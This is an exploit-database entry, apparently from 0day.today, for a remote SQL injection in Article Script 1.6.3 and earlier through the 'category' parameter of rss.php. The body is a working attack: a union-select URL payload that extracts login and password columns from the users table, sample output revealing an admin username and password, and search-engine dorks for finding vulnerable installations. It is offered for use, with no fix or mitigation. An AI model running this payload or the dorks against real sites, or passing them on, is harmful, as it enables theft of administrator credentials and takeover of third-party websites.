[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Article Script <= 1.6.3 (rss.php) Remote SQL Injection Vulnerability

Author
Liz0ziM
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1129
Category
web applications
Date add
06-11-2006
Platform
unsorted
====================================================================
Article Script <= 1.6.3 (rss.php) Remote SQL Injection Vulnerability
====================================================================



Article Script v1.*and v1.6.3 Sql injection

Script Name :Article Script

Bug Founder :Liz0ziM

Baba Kimdir? Tabiki Liz0ziM

------------------------------------------------------------

http://www.victim.com/articles/rss.php?category= ' sql &#304;njection

Example:

 http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*

 <title>admin4521title> ------> Admin name :admin4521

 <link>http://www.victim.com/articles/cs1120/page_1/link>  ----------> Admin password cs1120

Dork:

"Powered by Article Script"

":: Article Script - New User Article ::"

intitle:":: Article Script -"

"Last Articles::"

Greatz My all friend



#  0day.today [2024-11-15]  #